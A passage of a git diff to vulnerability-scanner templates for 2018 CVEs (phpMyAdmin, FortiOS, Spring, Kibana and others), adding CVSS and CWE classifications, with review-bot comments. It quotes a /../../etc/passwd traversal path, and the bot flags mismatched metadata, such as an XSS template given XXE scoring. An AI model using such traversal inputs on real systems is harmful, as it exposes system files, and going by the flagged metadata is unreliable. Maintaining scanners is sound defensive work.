a/cves/2018/CVE-2018-1247.yaml b/cves/2018/CVE-2018-1247.yaml index bfecc86952..c040304736 100644 --- a/cves/2018/CVE-2018-1247.yaml +++ b/cves/2018/CVE-2018-1247.yaml 
@@ -3,8 +3,19 @@ id: CVE-2018-1247 info: name: RSA Authentication Manager XSS author: madrobot - severity: medium + severity: high tags: cve,cve2018,xss,flash + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H + cvss-score: 7.10 + cve-id: CVE-2018-1247 + cwe-id: CWE-611 + description: "RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application." + reference: + - http://seclists.org/fulldisclosure/2018/May/18 + - http://www.securitytracker.com/id/1040835 + - http://www.securityfocus.com/bid/104107 + - https://www.exploit-db.com/exploits/44634/ requests: - method: GET diff --git a/cves/2018/CVE-2018-12613.yaml b/cves/2018/CVE-2018-12613.yaml index 59af7e6d53..40bfe42ba7 100644 --- a/cves/2018/CVE-2018-12613.yaml +++ b/cves/2018/CVE-2018-12613.yaml 
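Review bot: The classification added to CVE-2018-1247 describes a different issue from the one the template is named and tagged for: the template is `RSA Authentication Manager XSS` with tags `xss,flash`, while the new `description` and `cwe-id: CWE-611` describe an XML External Entity flaw and the new `cvss-metrics` is `AV:L/.../UI:R` (local attack vector, admin users). The severity bump from medium to high is therefore inherited from the XXE score, not from the XSS the template's request (its body is outside the hunk) is meant to detect. Either the CVE id on this template is wrong or the name and tags are; the metadata should describe one finding, and I would hold the severity change until that is resolved.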
@@ -3,9 +3,15 @@ id: CVE-2018-12613 info: name: PhpMyAdmin 4.8.1 Remote File Inclusion author: pikpikcu - severity: critical + severity: high reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 tags: cve,cve2018,phpmyadmin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-12613 + cwe-id: CWE-287 + description: "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication)." requests: - method: GET diff --git a/cves/2018/CVE-2018-12634.yaml b/cves/2018/CVE-2018-12634.yaml index ac652812c9..ed8c7f4131 100644 --- a/cves/2018/CVE-2018-12634.yaml +++ b/cves/2018/CVE-2018-12634.yaml @@ -5,8 +5,13 @@ info: author: geeknik description: CirCarLife is an internet-connected electric vehicle charging station reference: https://circontrol.com/ - severity: medium + severity: critical tags: cve,cve2018,scada,circontrol,circarlife,logs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-12634 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-1271.yaml b/cves/2018/CVE-2018-1271.yaml index 69e95546f3..52a285b05a 100644 --- a/cves/2018/CVE-2018-1271.yaml +++ b/cves/2018/CVE-2018-1271.yaml 
@@ -3,9 +3,15 @@ id: CVE-2018-1271 info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr - severity: high + severity: medium reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d tags: cve,cve2018,spring,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.90 + cve-id: CVE-2018-1271 + cwe-id: CWE-22 + description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." requests: - method: GET diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index e5adf3a49d..819b07b7a6 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml @@ -13,6 +13,11 @@ info: or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 tags: cve,cve2018,vmware,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1273 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml index 407d1422cc..87f73ec29a 100644 --- a/cves/2018/CVE-2018-1335.yaml +++ b/cves/2018/CVE-2018-1335.yaml 
@@ -3,11 +3,16 @@ id: CVE-2018-1335 info: name: Apache Tika 1.15-1.17 Header Command Injection author: pikpikcu - severity: critical + severity: high reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 tags: cve,cve2018,apache,tika,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-1335 + description: "From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18." requests: - method: PUT diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml index b0f305d163..93cc9387a3 100644 --- a/cves/2018/CVE-2018-13379.yaml +++ b/cves/2018/CVE-2018-13379.yaml @@ -3,8 +3,17 @@ id: CVE-2018-13379 info: name: FortiOS - Credentials Disclosure author: organiccrap - severity: high + severity: critical tags: cve,cve2018,fortios + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-13379 + cwe-id: CWE-22 + description: "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests." + reference: + - https://fortiguard.com/advisory/FG-IR-18-384 + - https://www.fortiguard.com/psirt/FG-IR-20-233 requests: - method: GET diff --git a/cves/2018/CVE-2018-13380.yaml b/cves/2018/CVE-2018-13380.yaml index d8cd9eb565..96cfe5534c 100644 --- a/cves/2018/CVE-2018-13380.yaml 
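Review bot: The classification block added to CVE-2018-1335 has no `cwe-id`, unlike every other block in this series; the CVE-2018-2791, CVE-2018-2893 and CVE-2018-2894 hunks have the same gap. If NVD lists no CWE for these entries, a comment inside the block such as `# no CWE assigned in NVD` would make the omission look deliberate rather than like a dropped line; otherwise the id should be filled in for consistency with the rest of the series. Separately, because this view collapses indentation I cannot confirm that the `description:` and `reference:` keys added after the block in the CVE-2018-13379 hunk (and in the CVE-2018-1247, CVE-2018-14574, CVE-2018-14728, CVE-2018-18069, CVE-2018-19439, CVE-2018-20824 and CVE-2018-2791 hunks) sit at `info` level rather than nested under `classification`; a validator pass on the rendered files would settle it.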
+++ b/cves/2018/CVE-2018-13380.yaml @@ -7,6 +7,11 @@ info: description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380 tags: cve,cve2018,fortios,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-13380 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml index 6c5d601a6f..cee7520213 100644 --- a/cves/2018/CVE-2018-14013.yaml +++ b/cves/2018/CVE-2018-14013.yaml @@ -7,6 +7,11 @@ info: description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 tags: cve,cve2018,xss,zimbra + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-14013 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-14064.yaml b/cves/2018/CVE-2018-14064.yaml index ddac97cab7..f3452b953f 100644 --- a/cves/2018/CVE-2018-14064.yaml +++ b/cves/2018/CVE-2018-14064.yaml 
@@ -3,13 +3,18 @@ id: CVE-2018-14064 info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko - severity: high + severity: critical description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 tags: cve,cve2018,lfi,camera,iot + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-14064 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-14574.yaml b/cves/2018/CVE-2018-14574.yaml index 1d95f3bd33..18f87e359a 100644 --- a/cves/2018/CVE-2018-14574.yaml +++ b/cves/2018/CVE-2018-14574.yaml @@ -3,8 +3,21 @@ id: CVE-2018-14574 info: name: Django Open Redirect author: pikpikcu - severity: low + severity: medium tags: cve,cve2018,django,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-14574 + cwe-id: CWE-601 + description: "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect." + reference: + - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ + - https://usn.ubuntu.com/3726-1/ + - http://www.securitytracker.com/id/1041403 + - https://www.debian.org/security/2018/dsa-4264 + - http://www.securityfocus.com/bid/104970 + - https://access.redhat.com/errata/RHSA-2019:0265 requests: - method: GET diff --git a/cves/2018/CVE-2018-14728.yaml b/cves/2018/CVE-2018-14728.yaml index 09d221c05a..0eaff41a52 100644 --- a/cves/2018/CVE-2018-14728.yaml +++ b/cves/2018/CVE-2018-14728.yaml 
@@ -3,8 +3,17 @@ id: CVE-2018-14728 info: name: Responsive filemanager 9.13.1 - SSRF/LFI author: madrobot - severity: high + severity: critical tags: cve,cve2018,ssrf,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-14728 + cwe-id: CWE-918 + description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter." + reference: + - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html + - https://www.exploit-db.com/exploits/45103/ requests: - method: POST diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml index d13e41671f..546ea91901 100644 --- a/cves/2018/CVE-2018-15473.yaml +++ b/cves/2018/CVE-2018-15473.yaml @@ -3,10 +3,15 @@ id: CVE-2018-15473 info: name: OpenSSH Username Enumeration author: r3dg33k,daffainfo - severity: low + severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 tags: network,openssh,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-15473 + cwe-id: CWE-362 network: - host: diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml index bfeb74b4de..ffe7f7ad24 100644 --- a/cves/2018/CVE-2018-15517.yaml +++ b/cves/2018/CVE-2018-15517.yaml 
@@ -6,8 +6,13 @@ info: reference: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt author: gy741 - severity: medium + severity: high tags: cve,cve2018,dlink,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N + cvss-score: 8.60 + cve-id: CVE-2018-15517 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml index 4c6646ce68..2304115e39 100644 --- a/cves/2018/CVE-2018-15535.yaml +++ b/cves/2018/CVE-2018-15535.yaml @@ -3,12 +3,17 @@ id: CVE-2018-15535 info: name: Responsive FileManager < 9.13.4 - Directory Traversal author: daffainfo - severity: medium + severity: high description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. reference: - https://www.exploit-db.com/exploits/45271 - https://www.cvedetails.com/cve/CVE-2018-15535 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-15535 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-15745.yaml b/cves/2018/CVE-2018-15745.yaml index 1c889bef1d..5b249a3069 100644 --- a/cves/2018/CVE-2018-15745.yaml +++ b/cves/2018/CVE-2018-15745.yaml 
@@ -7,6 +7,11 @@ info: description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt tags: cve,cve2018,argussurveillance,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-15745 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml index 1b13402b1e..2511f58f0e 100644 --- a/cves/2018/CVE-2018-16059.yaml +++ b/cves/2018/CVE-2018-16059.yaml @@ -8,6 +8,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://www.exploit-db.com/exploits/45342 tags: cve,cve2018,iot,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16059 + cwe-id: CWE-22 + description: "Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter." requests: - method: POST diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index 9f8c759dfc..da711614f9 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 tags: cve,cve2018,logontracer,rce,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16167 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml index f0ff1c0ca4..5da2280652 100644 --- a/cves/2018/CVE-2018-16283.yaml +++ b/cves/2018/CVE-2018-16283.yaml 
@@ -8,6 +8,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://www.exploit-db.com/exploits/45438 tags: cve,cve2018,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16283 + cwe-id: CWE-22 + description: "The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter." requests: - method: GET diff --git a/cves/2018/CVE-2018-16288.yaml b/cves/2018/CVE-2018-16288.yaml index 8705a4dbee..d74869f104 100644 --- a/cves/2018/CVE-2018-16288.yaml +++ b/cves/2018/CVE-2018-16288.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45440 - https://www.cvedetails.com/cve/CVE-2018-16288 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2018-16288 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml index fc05d97e9b..08a387bb74 100644 --- a/cves/2018/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -7,6 +7,11 @@ info: description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter. reference: https://www.exploit-db.com/exploits/45439 tags: wordpress,cve2018,cve,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-16299 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-16668.yaml b/cves/2018/CVE-2018-16668.yaml index c871990b87..76cc91f0bd 100644 --- a/cves/2018/CVE-2018-16668.yaml +++ b/cves/2018/CVE-2018-16668.yaml @@ -8,6 +8,11 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,iot,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16668 + cwe-id: CWE-287 requests: - method: GET 
diff --git a/cves/2018/CVE-2018-16670.yaml b/cves/2018/CVE-2018-16670.yaml index f9157661e3..b253aecfda 100644 --- a/cves/2018/CVE-2018-16670.yaml +++ b/cves/2018/CVE-2018-16670.yaml @@ -8,6 +8,11 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,plc,iot,disclosure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16670 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2018/CVE-2018-16671.yaml b/cves/2018/CVE-2018-16671.yaml index df6b1f3871..2457153b08 100644 --- a/cves/2018/CVE-2018-16671.yaml +++ b/cves/2018/CVE-2018-16671.yaml @@ -8,6 +8,11 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,iot,disclosure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16671 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index d04aa76fc8..bcdb226a69 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -9,6 +9,12 @@ info: - https://www.exploit-db.com/exploits/47138 - https://www.getfuelcms.com/ # Vendor Homepage - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Software Link + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16763 + cwe-id: CWE-74 + description: "FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution." requests: - raw: diff --git a/cves/2018/CVE-2018-17246.yaml b/cves/2018/CVE-2018-17246.yaml index 15aa7503d3..c4f12c3f51 100644 --- a/cves/2018/CVE-2018-17246.yaml +++ b/cves/2018/CVE-2018-17246.yaml 
@@ -2,12 +2,17 @@ id: CVE-2018-17246 info: name: Kibana Local File Inclusion author: princechaddha - severity: high + severity: critical description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-17246 + cwe-id: CWE-829 requests: - method: GET diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 433bc92b78..4cfc98d6bf 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -4,11 +4,16 @@ info: name: Joomla JCK Editor SQL Injection author: Suman_Kar description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. - severity: high + severity: critical tags: joomla,sqli,cve,cve2018 reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-17254 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index 9f70ac8290..ab6e84abda 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml 
@@ -9,6 +9,11 @@ info: reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-17431 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2018/CVE-2018-18069.yaml b/cves/2018/CVE-2018-18069.yaml index 890bb000cc..eab47b98dc 100644 --- a/cves/2018/CVE-2018-18069.yaml +++ b/cves/2018/CVE-2018-18069.yaml @@ -6,6 +6,13 @@ info: severity: medium description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. tags: cve,cve2018,wordpress,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18069 + cwe-id: CWE-79 + reference: + - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ requests: - method: POST diff --git a/cves/2018/CVE-2018-18775.yaml b/cves/2018/CVE-2018-18775.yaml index 12b50a4ea4..97386a655c 100644 --- a/cves/2018/CVE-2018-18775.yaml +++ b/cves/2018/CVE-2018-18775.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: microstrategy,xss reference: https://www.exploit-db.com/exploits/45755 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18775 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-18777.yaml b/cves/2018/CVE-2018-18777.yaml index cba64072e6..742080b74f 100644 --- a/cves/2018/CVE-2018-18777.yaml +++ b/cves/2018/CVE-2018-18777.yaml 
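Review bot: The new classification for CVE-2018-18069 sets `PR:N` and the added reference is titled "unauthenticated stored XSS", but the existing `description` two lines above says the XSS is triggered via "an authenticated theme-localization.php request to wp-admin/admin.php"; both cannot be right about the privileges required. If the metrics were copied from NVD, the description is presumably the one to adjust, but either way the two should agree before the template carries a score that implies no authentication. The request block begins outside the hunk.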
@@ -3,13 +3,18 @@ id: CVE-2018-18777 info: name: Path traversal vulnerability in Microstrategy Web version 7 author: 0x_Akoko - severity: high + severity: medium description: | Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. reference: https://www.exploit-db.com/exploits/45755 tags: microstrategy,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2018-18777 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml index 51fa08f10d..556e6cf52e 100644 --- a/cves/2018/CVE-2018-18778.yaml +++ b/cves/2018/CVE-2018-18778.yaml @@ -3,10 +3,15 @@ id: CVE-2018-18778 info: name: mini_httpd Path Traversal author: dhiyaneshDK - severity: high + severity: medium description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2018-18778 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2018/CVE-2018-19386.yaml b/cves/2018/CVE-2018-19386.yaml index 7e686b8ceb..1d426ddfe2 100644 --- a/cves/2018/CVE-2018-19386.yaml +++ b/cves/2018/CVE-2018-19386.yaml 
@@ -6,6 +6,12 @@ info: severity: medium reference: https://www.cvedetails.com/cve/CVE-2018-19386/ tags: cve,cve2018,solarwinds,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-19386 + cwe-id: CWE-79 + description: "SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI." requests: - method: GET diff --git a/cves/2018/CVE-2018-19439.yaml b/cves/2018/CVE-2018-19439.yaml index b953866c96..ba2f295d30 100644 --- a/cves/2018/CVE-2018-19439.yaml +++ b/cves/2018/CVE-2018-19439.yaml @@ -3,9 +3,18 @@ id: CVE-2018-19439 info: name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console author: madrobot,dwisiswant0 - severity: high + severity: medium description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4) tags: cve,cve2018,oracle,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-19439 + cwe-id: CWE-79 + reference: + - http://www.securityfocus.com/bid/106006 + - http://seclists.org/fulldisclosure/2018/Nov/58 + - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html requests: - method: GET diff --git a/cves/2018/CVE-2018-19458.yaml b/cves/2018/CVE-2018-19458.yaml index bd3bb051fe..8bfc61e40a 100644 --- a/cves/2018/CVE-2018-19458.yaml +++ b/cves/2018/CVE-2018-19458.yaml 
@@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45780 - https://www.cvedetails.com/cve/CVE-2018-19458 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-19458 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index a7af37791e..fa78623265 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -7,6 +7,11 @@ info: description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-20462 + 